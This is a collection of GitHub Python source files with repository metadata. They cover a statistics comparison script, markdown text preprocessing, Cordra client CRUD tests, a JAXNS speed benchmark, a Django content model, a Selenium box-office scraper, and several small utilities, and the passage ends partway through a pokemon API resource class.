+{"seq_id":"23792886871","text":"from scipy.stats import mannwhitneyu\nimport pandas as pd\nimport numpy as np\nimport os\n\nroot = \"/Users/6j9/projects/mouse/deseq/matrix\"\npath_a = os.path.join(root, \"upenn_mouse_lfc_pairwise_matrix_inf-1.30_padj-0.01.tsv\")\npath_b = os.path.join(root, \"upenn_mouse_lfc_pairwise_matrix_inf-1.30_padj-0.01_ikbkb-neg.tsv\")\n\ndef compare_matrices(b, a):\n a, b = a.values.flatten(), b.values.flatten()\n print(mannwhitneyu(a, b, alternative='two-sided'))\n return\n u, p = mannwhitneyu(a, b)\n effect_size = u / (len(a) * len(b))\n print(f\"common language effect size: {effect_size}, overlap p-statistic: {p}\")\n\nmat_a = pd.read_csv(path_a, sep=\"\\t\", index_col=0)\nmat_b = pd.read_csv(path_b, sep=\"\\t\", index_col=0)\n\ntest = compare_matrices(mat_a, mat_b)\n","repo_name":"jeanmerlet/stm_mouse_skin_ikkb","sub_path":"deseq/compare_two_matrices.py","file_name":"compare_two_matrices.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"43283620807","text":"import re\nimport json\n\nimport pandas as pd\nfrom pandas import DataFrame\nfrom bs4 import BeautifulSoup\nfrom markdown import markdown\n\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\nimport nltk\n\nnltk.download(\"wordnet\")\nnltk.download(\"omw-1.4\")\nnltk.download('stopwords')\n\nstemmer = WordNetLemmatizer()\nstop_words = set(stopwords.words('english'))\n\n\ndef kaggle_cleaning(document, min_len=4):\n document = re.sub(r\"_\", \" \", document)\n document = re.sub(r\"\\W\", \" \", document)\n document = re.sub(r\"\\s+[a-zA-Z]\\s+\", \" \", document)\n document = re.sub(r\"\\^[a-zA-Z]\\s+\", \" \", document)\n document = re.sub(r\"\\s+\", \" \", document)\n document = re.sub(r\"^b\\s+\", \" \", document)\n document = re.sub(r\"\\s+[a-zA-Z]\\s+\", \" \", document)\n\n document = document.strip().lower()\n tokens = document.split()\n tokens = [stemmer.lemmatize(token) for token in tokens]\n tokens = [\n token\n for token in tokens\n if len(token) >= min_len and token not in stop_words\n ]\n return \" \".join(tokens)\n\n\ndef clean_text(document):\n # Remove all the special characters\n document = re.sub(r\"\\W\", \" \", str(document))\n # remove all single characters\n document = re.sub(r\"\\s+[a-zA-Z]\\s+\", \" \", document)\n # Remove single characters from the start\n document = re.sub(r\"\\^[a-zA-Z]\\s+\", \" \", document)\n # Substituting multiple spaces with single space\n document = re.sub(r\"\\s+\", \" \", document, flags=re.I)\n # Removing prefixed 'b'\n document = re.sub(r\"^b\\s+\", \"\", document)\n # Converting to Lowercase\n document = document.lower()\n return document\n\n\nclass MdProcessor:\n def __init__(self):\n self.features = {\n \"text\": lambda s: clean_text(\"\".join(s.findAll(text=True))),\n \"headers\": self.rule2text(re.compile(\"^h[1-6]$\")),\n \"bold_text\": self.rule2text(\"strong\"),\n \"italic_text\": self.rule2text(\"i\"),\n \"code\": self.rule2text(\"code\"),\n \"links_labels\": self.rule2text(\"a\"),\n \"image_labels\": self.get_image_labels,\n \"links\": self.get_links,\n }\n\n @staticmethod\n def rule2text(search_fun):\n return lambda s: [i.text for i in s.find_all(search_fun)]\n\n @staticmethod\n def get_image_labels(s):\n return [i['alt'] for i in s.find_all('img', alt=True)]\n\n @staticmethod\n def get_links(s):\n return [\n i['href'] if i.name == 'a' else i['src']\n for i in s.find_all('a') + s.find_all('img')\n ]\n\n def process(self, md_string):\n soup = BeautifulSoup(markdown(md_string), \"html.parser\")\n res = {}\n for name, fun in self.features.items():\n res[name] = fun(soup)\n\n return json.dumps(res)\n\n\ndef preprocess_dataframe(df: DataFrame) -> DataFrame:\n md_processor = MdProcessor()\n md_mask = df[\"cell_type\"] == \"markdown\"\n\n df[\"processed_source\"] = None\n df.loc[md_mask, \"processed_source\"] = df[md_mask].source.apply(\n lambda row: md_processor.process(row)\n )\n\n return df\n\n\nclass DatasetProcessor:\n def __init__(self, path):\n self.df = pd.read_feather(path)\n self.mapping = {\"markdown\": MdProcessor}\n\n @property\n def dataset(self):\n return self.df\n\n def process_dataset(self):\n for cell_type, processor in self.mapping:\n md_mask = self.df[\"cell_type\"] == cell_type\n self.df[\"processed_source\"] = None\n self.df.loc[md_mask, \"processed_source\"] = self.df[md_mask].source.apply(\n lambda row: processor.process(row)\n )\n\n\nif __name__ == '__main__':\n prc = MdProcessor()\n md = '![CNN Architecture](https://upload.wikimedia.org/wikipedia/commons/6/63/Typical_cnn.png)'\n md += '\\nMy favorite search engine is [Duck Duck Go](https://duckduckgo.com).'\n print(prc.process(md))\n","repo_name":"JetBrains-Research/AI4Code-kaggle","sub_path":"data_managment/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"37697236022","text":"\"\"\"Check the CordraClient Class and its functionality. Should be able to fully reproduce the \nfunctionality of the Cordra REST API. This includes:\n* Authorization using user / password\n* Authorization using a secret key\n* Provide a token for subsequent authorization\n* Delete a token\n* Create a cordra object\n* Setting the ACL on a cordra object on create\n* Updating a cordra object\n* Updating a cordra object attribute\n* Updating a cordra object payload\n* Updating the ACL of a cordra object\n* Deleting a cordra object\n* Deleting a cordra object attribute\n* Deleting a cordra object payload\n* Querying cordra\n\nThe CordraClient also provides the additional features:\n* Reading all schemas from a remote Cordra instance and turning them into python classes\n\"\"\"\n\n\nfrom cordra import CordraClient, CordraObject\nfrom io import BytesIO\nfrom PIL import Image\nimport json\nimport requests\nimport copy\n\n\n\n# Deepcopy inputs to force a local scope\ndef deepcopy(func):\n def wrap(*args, **kwargs):\n args = list(args)\n for i, arg in enumerate(args):\n args[i] = copy.deepcopy(arg)\n for k, v in enumerate(kwargs):\n kwargs[k] = copy.deepcopy(v)\n return func(*args, **kwargs)\n return wrap\n\n\n# Connect to the test repository\nrepository = CordraClient(host=\"https://localhost:8443/\", credentials_file=\"secretlogin.json\", verify=False)\n\n# Define the document object without a remote repository\ndocument = CordraObject(_type=\"Document\", awesome=\"superb\")\n\n# Define a document object with JSON and Image payloads\ndocument_payloads = CordraObject(_type=\"Document\")\nJ = {\"a\": \"a\", \"b\":\"b\"}\ndocument_payloads.add(\"document.json\", json.dumps(J).encode()) # Add a json payload as bytes\n\nstream = BytesIO()\nA = Image.radial_gradient(\"L\").resize((11,11))\nA.save(stream, format=\"PNG\") # Write a png image to bytes object\ndocument_payloads.add(\"radial.png\", stream.getvalue()) # Add the png (in bytes) as payload\n\n\n\n\n# Test 1 - Check that a python CordraObject can be created and updated locally and correctly \n# write to Cordra\n@deepcopy\ndef Test1(document):\n document.hello = \"world\" # Update the python instance\n\n print(document)\n print(document._type)\n\n r = repository.create(document) # Write to Cordra\n print(json.dumps(r, indent=2))\n document.id = str( r[\"id\"] ) # Update the id from None to the id assigned by Cordra\n\n document_remote = repository.read( document.id ) # Read the cordra object and compare to local\n\n assert document.dict() == document_remote.dict(), \\\n \"Remote and local objects are note the same.\" # Check equivalence of objects' dicts\n\n return document\n\n\n\n\n# Test 2 - Check that local and remote payloads are equal\n@deepcopy\ndef Test2(document):\n r = repository.create(document) # Create cordra object with payloads\n document.id = str( r[\"id\"] ) # Update the id from None to the id assigned by Cordra\n\n document_remote = repository.read( document.id, getAll=True ) # Read the Object and Payloads\n\n K = json.loads( document_remote.get(\"document.json\").decode('utf-8') ) # Decode payload bytes\n assert J==K, \"JSON payload was corrupted.\"\n\n B = document_remote.get(\"radial.png\")\n assert stream.getvalue()==B, \"Image bytes were corrupted.\"\n\n return document\n\n\n\n\n# Test 3 - Check that an update can be successfully written to an object that already exists\n# in Cordra.\n@deepcopy\ndef Test3(document):\n r = repository.create(document)\n document.id = str( r[\"id\"] )\n\n # Update everything but payloads (faster updates)\n document.awesome = \"wonderful\" # Update the existing attributes of object\n document.updateditem = \"SendUpdate\" # Update new attributes of object\n repository.update(document, updatePayloads=False)\n\n document_remote = repository.read( document.id ) # Check that the updated objects are the same\n assert document.dict() == document_remote.dict(), \\\n \"Updated object attributes differ after synced update.\"\n\n\n # Update everything\n L = {\"c\": \"c\", \"d\":\"d\"}\n document.add(\"document.json\", json.dumps(L).encode()) # Update the JSON payload\n repository.update(document)\n\n document_remote = repository.read( document.id, getAll=True )\n K = json.loads( document_remote.get(\"document.json\").decode('utf-8') )\n assert L==K, \"JSON payloads differ after synced update.\"\n\n return document\n\n\n\n\n# Test 4 - Deletion of payloads and properties\n@deepcopy\ndef Test4(document):\n # Delete a payload\n # Verify local no longer has the payload\n # Verify local and remote are the same\n # Delete a property of object\n # Verify local no longer has the property\n # Verify local and remote are the same\n return document\n\n\n\n\n# Test 5 - Update ACLs\n@deepcopy\ndef Test5():\n ## create user\n guest = CordraObject(type=\"User\", username=\"guest\", password=\"guestpassword...1\", \n requirePasswordChange=False)\n r = repository.create(guest)\n guest.id = r[\"id\"]\n\n ## create object with ACL that includes created user\n ## create an engine with the new user credentials\n ## check that object can be edited by the new user\n return document\n\n\n\n\n# Test 6 - Delete an object\n@deepcopy\ndef Test6(document):\n # Delete the object\n repository.delete(document)\n # Verify the object does not exist\n try:\n repository.read(document.id)\n assert False, \"Object was NOT deleted\"\n except requests.exceptions.HTTPError:\n pass\n\n\n\n\n\nif __name__ == \"__main__\":\n documents_returned = [\n Test1(document),\n Test2(document_payloads),\n Test3(document_payloads),\n Test4(document_payloads),\n Test5(document)\n ]\n\n for i, d in enumerate( documents_returned ):\n if d.id is not None: Test6(d)\n","repo_name":"SvenPVoigt/CordraPy-RDF","sub_path":"tests/CRUD_CordraClient.py","file_name":"CRUD_CordraClient.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"23426745679","text":"import argparse\ntry:\n from jaxns.nested_sampling import NestedSampler\n from jaxns.prior_transforms import PriorChain, UniformPrior, NormalPrior\nexcept:\n raise ImportError(\"Install JaxNS with GPU support!\")\nfrom timeit import default_timer\nimport numpy as np\nimport pylab as plt\nfrom functools import partial\nfrom jax import random, jit, numpy as jnp, devices as jax_devices\nimport jax.scipy.linalg as jax_linalg\nfrom jax.config import config\n\nconfig.update(\"jax_enable_x64\", True)\n\nTEST_NDIMS = [10,20,30,40,50,60,70,80,90,100]\n\ndef jax_log_normal(x, mean, cov):\n L = jnp.linalg.cholesky(cov)\n dx = x - mean\n dx = jax_linalg.solve_triangular(L, dx, lower=True)\n return -0.5 * x.size * jnp.log(2. * jnp.pi) - jnp.sum(jnp.log(jnp.diag(L))) \\\n - 0.5 * dx @ dx\n\n\ndef main(use_gpu):\n devices = jax_devices()\n if use_gpu:\n gpu_dev = None\n for dev in devices:\n if dev.platform == 'gpu':\n gpu_dev = dev\n break\n if gpu_dev is None:\n raise ValueError(f\"No valid GPU device among {devices}\")\n else:\n cpu_dev = None\n for dev in devices:\n if dev.platform == 'cpu':\n cpu_dev = dev\n break\n if cpu_dev is None:\n raise ValueError(f\"No valid CPU device among {devices}\")\n def run_with_n(ndims, num_live_points):\n prior_mu = 2 * jnp.ones(ndims)\n prior_cov = jnp.diag(jnp.ones(ndims)) ** 2\n\n data_mu = jnp.zeros(ndims)\n data_cov = jnp.diag(jnp.ones(ndims)) ** 2\n data_cov = jnp.where(data_cov == 0., 0.95, data_cov)\n\n jax_log_likelihood = lambda theta, **kwargs: jax_log_normal(theta, data_mu, data_cov)\n\n prior_transform = PriorChain().push(NormalPrior('theta', prior_mu, jnp.sqrt(jnp.diag(prior_cov))))\n ns = NestedSampler(jax_log_likelihood, prior_transform, sampler_name='slice')\n\n @partial(jit, backend='gpu' if use_gpu else 'cpu')\n def run(key):\n return ns(key=key,\n num_live_points=num_live_points,\n max_samples=1e7,\n collect_samples=False,\n termination_frac=0.001,\n sampler_kwargs=dict(depth=3, num_slices=5))\n\n # first run to make it compile\n results = run(random.PRNGKey(2345256))\n results.logZ.block_until_ready()\n # now measure time\n t0 = default_timer()\n results = run(random.PRNGKey(3498576))\n results.logZ.block_until_ready()\n run_time = (default_timer() - t0)\n\n print(f\"JAXNS num_live_points={num_live_points} ndims={ndims} run time: {run_time}\")\n if results.num_samples >= 1e7:\n raise ValueError(\"Reached maximum number of samples {}.\".format(results.num_samples))\n return run_time\n\n save_file = 'speed_test_results_{}.npz'.format('GPU' if use_gpu else 'CPU')\n run_times = [run_with_n(ndims, ndims*50) for ndims in TEST_NDIMS]\n np.savez(save_file,\n test_ndims = np.array(TEST_NDIMS),\n run_times=np.array(run_times))\n\n run_times = np.load(save_file)['run_times']\n test_ndims = np.load(save_file)['test_ndims']\n\n plt.plot(test_ndims, run_times, label='GPU' if use_gpu else 'CPU')\n plt.legend()\n plt.show()\n\n\n\n\ndef add_args(parser):\n parser.register(\"type\", \"bool\", lambda v: v.lower() == \"true\")\n parser.add_argument('--use_gpu', help='Whether to use GPU or else CPU',\n default=False, type=\"bool\", required=False)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Runs a speed test on CPU or GPU.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n add_args(parser)\n flags, unparsed = parser.parse_known_args()\n print(\"Running with:\")\n for option, value in vars(flags).items():\n print(\" {} -> {}\".format(option, value))\n\n main(**vars(flags))","repo_name":"Joshuaalbert/jaxns_paper","sub_path":"speed_test/speed_test.py","file_name":"speed_test.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"4918023139","text":"\"\"\"model_characteristics_added\n\nRevision ID: 4db2c98dc94d\nRevises: 5daf25e84504\nCreate Date: 2020-07-30 15:04:49.242069\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '4db2c98dc94d'\ndown_revision = '5daf25e84504'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('Model', sa.Column('Characteristics', postgresql.ARRAY(sa.String()), nullable=True))\n op.add_column('Model', sa.Column('Characteristics RU', postgresql.ARRAY(sa.String()), nullable=True))\n op.add_column('Model', sa.Column('Characteristics UK', postgresql.ARRAY(sa.String()), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('Model', 'Characteristics UK')\n op.drop_column('Model', 'Characteristics RU')\n op.drop_column('Model', 'Characteristics')\n # ### end Alembic commands ###\n","repo_name":"ldvy/mediPrime-website","sub_path":"migrations/versions/4db2c98dc94d_model_characteristics_added.py","file_name":"4db2c98dc94d_model_characteristics_added.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"27692049940","text":"import os\nimport uuid\n\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.db.models.signals import pre_save, post_delete\nfrom django.dispatch import receiver\n\nfrom users.models import User\nfrom main import utils\nfrom main.utils import EmbedHTML\n\nfrom markdownx.models import MarkdownxField\n\n\nclass TimeStampedModel(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n modified_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n abstract = True\n\n\nclass Content(TimeStampedModel):\n\n # 画像ファイルの保存場所\n def get_image_path(self, filename):\n name = str(uuid.uuid4())\n extension = os.path.splitext(filename)[-1]\n return 'images/' + name + extension\n\n # 製作者\n creator = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"contents\")\n # タイトル\n title = models.CharField('作品タイトル', max_length=64)\n # 説明\n description = MarkdownxField('説明文', blank=True, null=True)\n # コンテンツのタイプ\n content_type = models.CharField(\n 'コンテンツの種類',\n choices=utils.CONTENT_TYPES, default=utils.SCRATCH, max_length=32)\n # 一覧で表示される画像\n thumbnail = models.ImageField('トップ画像', upload_to=get_image_path)\n # プロジェクトの各種サイトURL\n url = models.URLField('作品の掲載元のURL', blank=True, null=True, default=\"\")\n # 埋め込み用HTML: receiverによる自動入力\n embed_html = models.TextField(blank=True, null=False)\n\n def __str__(self):\n return f'{self.content_type}: {self.title}'\n\n @property\n def is_embed_type(self):\n \"\"\"コンテンツ埋め込みタイプであるかどうか\"\"\"\n return self.content_type in utils.EMBED_TYPES\n\n def is_created_by(self, user):\n \"\"\"コンテンツ投稿者であるかどうか\"\"\"\n return self.creator == user\n\n # 訪問履歴取得関数群\n def get_visits_other_than_creator(self):\n \"\"\"コンテンツ投稿者以外の訪問履歴を取得\"\"\"\n return self.visits.filter(~Q(visitor=self.creator))\n\n def get_visits_only_logged_in_user(self):\n \"\"\"ログインユーザーのみの訪問履歴を取得\"\"\"\n return self.visits.filter(~Q(visitor=None))\n\n\nclass ContentVisit(TimeStampedModel):\n \"\"\"作品への訪問\"\"\"\n # 訪問された作品\n content = models.ForeignKey(\n Content, on_delete=models.CASCADE, related_name=\"visits\")\n # 訪問したユーザー(ログインしていなければAnonymousUser)\n visitor = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"visits\",\n blank=True, null=True, default=None)\n # 接続元IPアドレス\n remote_addr = models.GenericIPAddressField('接続元IPアドレス')\n # 接続元UserAgent\n user_agent = models.TextField('接続元UserAgent')\n # リクエストHTTPメソッド\n request_method = models.CharField('HTTPメソッド', max_length=10)\n\n def __str__(self):\n title = self.content.title\n visitor = self.visitor\n if visitor:\n visitor_name = visitor.username\n else:\n visitor_name = \"AnonymousUser\"\n date = self.created_at.strftime(r\"%Y/%m/%d %H:%M:%S\")\n return f'[{date}] \"{title}\" - {visitor_name}'\n\n\n# class Favorite(TimeStampedModel):\n# content = models.OneToOneField(\n# Content, related_name=\"likes\", on_delete=models.CASCADE)\n# users = models.ManyToManyField(User, related_name='likes')\n\n# def __str__(self):\n# return f'{self.content.title}'\n\n\n@receiver(pre_save, sender=Content)\ndef validate_url_and_auto_fill_embed_html_pre_save(\n sender, instance: Content, *args, **kwargs):\n \"\"\"URLのvalidation後、コンテンツ保存前にURLに合わせて埋め込み用のHTMLを生成して入力する\"\"\"\n if instance.url:\n # URLのクリーニング\n content_type = instance.content_type\n url = utils.clean_content_url(instance.url, content_type)\n instance.url = url\n # URLのバリデーション\n content_url_validator = utils.ContentURLValidator()\n content_url_validator(url, content_type)\n # safetyなURLから埋め込み用のHTMLを取得\n if content_type in utils.EMBED_TYPES:\n get_embed_html = EmbedHTML(content_type, url)\n instance.embed_html = get_embed_html()\n\n\n@receiver(post_delete, sender=Content)\ndef auto_remove_image_file_post_delete(sender, instance, *args, **kwargs):\n \"\"\"コンテンツ削除時に画像削除\"\"\"\n if instance.thumbnail:\n if os.path.isfile(instance.thumbnail.path):\n os.remove(instance.thumbnail.path)\n\n\n@receiver(pre_save, sender=Content)\ndef auto_remove_image_on_change(sender, instance, **kwargs):\n \"\"\"画像変更時に元画像削除\"\"\"\n if not instance.pk:\n return False\n\n try:\n old_file = Content.objects.get(pk=instance.pk).thumbnail\n except Content.DoesNotExist:\n return False\n\n if not bool(old_file):\n return False\n\n new_file = instance.thumbnail\n if not old_file == new_file:\n if os.path.isfile(old_file.path):\n os.remove(old_file.path)\n","repo_name":"USHIken/web-idea-box","sub_path":"code/main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"1611967225","text":"import time\n\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\n\n# Config headless browser\nopt = Options()\nopt.add_argument(\"--headless\")\nopt.add_argument(\"--disable-gpu\")\n\nweb = Chrome(options=opt) # Config the headless to the chrome.\n\nurl = 'https://www.endata.com.cn/BoxOffice/BO/Year/index.html'\n\nweb.get(url)\n\n# GET select elements;\nsel_element = web.find_element(By.XPATH, '//*[@id=\"OptionDate\"]') # GET element\n\n# Packed the element to become selectable.\nsel = Select(sel_element)\n\n# Let the browser switch option\n\nfor i in range(len(sel.options)):\n sel.select_by_index(i)\n time.sleep(3)\n table = web.find_element(By.XPATH, '//*[@id=\"TableList\"]/table')\n print(table.text)\n print(\"**********************************************************\")\n\nweb.close()\n","repo_name":"etn13/pythonlearning","sub_path":"p04_selenium/s03_withoutheader.py","file_name":"s03_withoutheader.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"10489072132","text":"def validar_positivo(inf, mensaje, ban=True):\n n = inf\n while n <= inf:\n if ban:\n n = int(input(mensaje))\n else:\n n = float(input(mensaje))\n if n <= inf:\n print(f\"\\nError ! ingrese un valor superior a [{inf}].\")\n\n return n\n\n\ndef validar_rango(inf, sup, mensaje, ban=True):\n n = inf-1\n while n < inf or n > sup:\n if ban:\n n = int(input(mensaje))\n else:\n n = float(input(mensaje))\n if n < inf or n > sup:\n print(f\"\\nError ! ingrese un valor entre [{inf}-{sup}].\")\n return n\n\n\ndef validar_codigo(tam, mensaje):\n cad = \"\"\n while tam == len(cad):\n cad = input(mensaje)\n if tam == len(cad):\n print(\"\\nError ! la cadena no puede estar vacia.\")\n\n return cad\n","repo_name":"juanjoowendler/de_todo_con_python","sub_path":"practicas/practicas_final_materia/practica_ejercicios_final/practica_final_2/modulo_funciones.py","file_name":"modulo_funciones.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"4726562304","text":"import unittest\nimport dgsl_engine.game_factory as factory\n\n\n# Tests ################################################################\n\nclass TestGameFactory(unittest.TestCase):\n def setUp(self):\n fact = factory.GameFactory()\n self.game = fact.new('tests/worlds/testing_ground')\n\n def test_new(self):\n # Not really an adequate tests, but it runs the code.\n self.assertEqual(self.game.world.details.name, 'testing ground')\n self.assertEqual(self.game.world.details.version, '0.0')\n self.assertEqual(self.game.world.details.welcome, 'fun is waiting!')\n\n def test_name_to_path(self):\n name = 'some fun world'\n path = 'some_fun_world.world'\n self.assertEqual(factory.name_to_path(name), path)\n\n# Main #################################################################\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"strinsberg/dgsl-text-adventure-engine","sub_path":"tests/test_game_factory.py","file_name":"test_game_factory.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"9814982526","text":"import json\n\nclass LocalDatabase:\n def __init__(self):\n print(\"Database is local\")\n with open('../mock/localDatabase.json', 'r') as file:\n content = json.load(file)\n self.musicScoreList = content['musicScores']\n self.composersList = content['composers']\n self.composerInc = len(self.composersList)\n\n def getAllMusicScores(self, column=''):\n return self.musicScoreList\n\n def insertMusicScore(self, musicScore):\n jsonMusicScore = {}\n jsonMusicScore['title'] = musicScore['title']\n jsonMusicScore['commonname'] = self.composersList[int(musicScore['composer'])]['commonname']\n jsonMusicScore['type'] = musicScore['type']\n jsonMusicScore['dateofcreation'] = musicScore['dateofcreation']\n jsonMusicScore['difficulty'] = musicScore['difficulty']\n jsonMusicScore['appreciation'] = musicScore['appreciation']\n jsonMusicScore['comments'] = musicScore['comments']\n self.musicScoreList.append(jsonMusicScore)\n\n def getAllComposers(self, column='*'):\n return self.composersList\n\n def insertComposer(self, composer):\n jsonComposer = {}\n jsonComposer['commonname'] = composer['name']\n jsonComposer['fullname'] = composer['fullname']\n jsonComposer['dateofbirth'] = composer['dateofbirth']\n jsonComposer['dateofdeath'] = composer['dateofdeath']\n jsonComposer['nationality'] = composer['nationality']\n jsonComposer['style'] = composer['style']\n jsonComposer['composer_id'] = self.composerInc\n self.composerInc += 1\n self.composersList.append(jsonComposer)\n\nif __name__ == \"__main__\":\n db = LocalDatabase()\n print(db.getAllMusicScore())\n print(db.getAllComposers())","repo_name":"tuxnut/music_db","sub_path":"app/LocalDatabase.py","file_name":"LocalDatabase.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"76469492","text":"#!/usr/bin/env python\n\"\"\"\nScript to update links to project version nodes\n\n\"\"\"\nimport logging\nimport sys\n\nfrom LbUtils.Script import Script\nfrom LbRelease.SoftConfDB.SoftConfDB import SoftConfDB\n\n\nclass LbSdbUpdateVersion(Script):\n \"\"\" Update information about a project / version \"\"\"\n\n def defineOpts(self):\n \"\"\" Script specific options \"\"\"\n parser = self.parser\n parser.add_option(\"-d\",\n dest = \"debug\",\n action = \"store_true\",\n help = \"Display debug output\")\n\n parser.add_option(\"-s\",\n dest = \"action\",\n action = \"store\",\n default = \"a\",\n help = \"Set the action to be done: a: clear active flags, u: clear used flags\")\n\n\n def main(self):\n \"\"\" Main method for bootstrap and parsing the options.\n It invokes the appropriate method and \"\"\"\n self.log = logging.getLogger()\n opts = self.options\n args = self.args\n if opts.debug:\n self.log.setLevel(logging.DEBUG)\n else:\n self.log.setLevel(logging.WARNING)\n if len(args) < 2 :\n self.log.error(\"Not enough arguments\")\n sys.exit(1)\n else :\n project = args[0].upper()\n version = args[1]\n\n # Connect to the ConfDB to update the platform\n self.mConfDB = SoftConfDB()\n if self.options.action.lower() == \"a\":\n self.mConfDB.setPVActive(project, version)\n elif self.options.action.lower() == \"u\":\n self.mConfDB.setPVUsed(project, version)\n else:\n self.log.error(\"Unknown action %s \" % self.options.action)\n\nif __name__=='__main__':\n sUsage = \"\"\"%prog project version \"\"\"\n s = LbSdbUpdateVersion(usage=sUsage)\n sys.exit(s.run())\n\n\n","repo_name":"stonish/lhcb-software","sub_path":"LbScripts/LbRelease/python/LbRelease/SoftConfDB/LbSdbUpdateVersion.py","file_name":"LbSdbUpdateVersion.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"41"} +{"seq_id":"71757959805","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import accuracy_score\nfrom data.student_demographics import demographics\n\n\n\ndef predict_gpa(demographics):\n\n # Load the student data into a pandas dataframe\n demographics_df = pd.DataFrame(demographics)\n\n\n # Split the data into training and testing sets\n X = demographics_df.drop('GPA', axis=1)\n y = demographics_df['GPA']\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n # Create a decision tree classifier\n clf = DecisionTreeClassifier()\n\n # Fit the classifier to the training data\n clf.fit(X_train, y_train)\n\n # Make predictions on the testing data\n y_pred = clf.predict(X_test)\n\n # Evaluate the accuracy of the model\n accuracy = accuracy_score(y_test, y_pred)\n print('Accuracy:', accuracy)\n # Return the predicted GPA\n return y_pred.tolist()\n\npredict_gpa(demographics)","repo_name":"KellyPared/Learning_Dashboard","sub_path":"machine_learning_gpa.py","file_name":"machine_learning_gpa.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"15371325298","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'getTotalX' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER_ARRAY a\n# 2. INTEGER_ARRAY b\n#\n\ndef getTotalX(a, b):\n \"\"\"\n Brute force, basic math / number theory too hard T_T\n \"\"\"\n a,b = list(set(a)), list(set(b))\n reduced_a, reduced_b = [], []\n a.sort()\n b.sort()\n for i in range(len(a)):\n add = True\n for j in range(i+1,len(a)):\n if j < len(a) and a[j] % a[i] == 0:\n add = False\n break\n if add:\n reduced_a.append(a[i])\n\n blacklist = set()\n for i in range(len(b)):\n if b[i] in blacklist:\n continue\n for j in range(i+1,len(b)):\n if j < len(b) and b[j] % b[i] == 0:\n blacklist.add(b[j])\n reduced_b.append(b[i])\n\n cur_val, stop = max(reduced_a), min(reduced_b)\n step = cur_val\n\n output = 0\n print(reduced_a)\n print(reduced_b)\n\n while cur_val <= stop:\n go_next = False\n for i in reduced_a:\n if cur_val % i != 0:\n go_next = True\n break\n if go_next:\n cur_val += step\n continue\n\n for i in reduced_b:\n if i % cur_val != 0:\n go_next = True\n break\n if go_next:\n cur_val += step\n continue\n\n output += 1\n cur_val += step\n\n return output\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n first_multiple_input = input().rstrip().split()\n\n n = int(first_multiple_input[0])\n\n m = int(first_multiple_input[1])\n\n arr = list(map(int, input().rstrip().split()))\n\n brr = list(map(int, input().rstrip().split()))\n\n total = getTotalX(arr, brr)\n\n fptr.write(str(total) + '\\n')\n\n fptr.close()\n\n","repo_name":"fyangss/questions","sub_path":"python/hr/algorithms/between_two_sets_easy.py","file_name":"between_two_sets_easy.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"17343743678","text":"from typing import TYPE_CHECKING, Any, Dict, List\n\nfrom aiopoke.objects.utility import Name, NamedResource\nfrom aiopoke.utils.minimal_resources import MinimalResource\n\nif TYPE_CHECKING:\n from aiopoke.objects.resources import VersionGroup\n\n\nclass Version(NamedResource):\n version_group: MinimalResource[\"VersionGroup\"]\n names: List[\"Name\"]\n\n def __init__(\n self,\n *,\n id: int,\n name: str,\n version_group: Dict[str, Any],\n names: List[Dict[str, Any]]\n ) -> None:\n super().__init__(id=id, name=name)\n self.version_group = 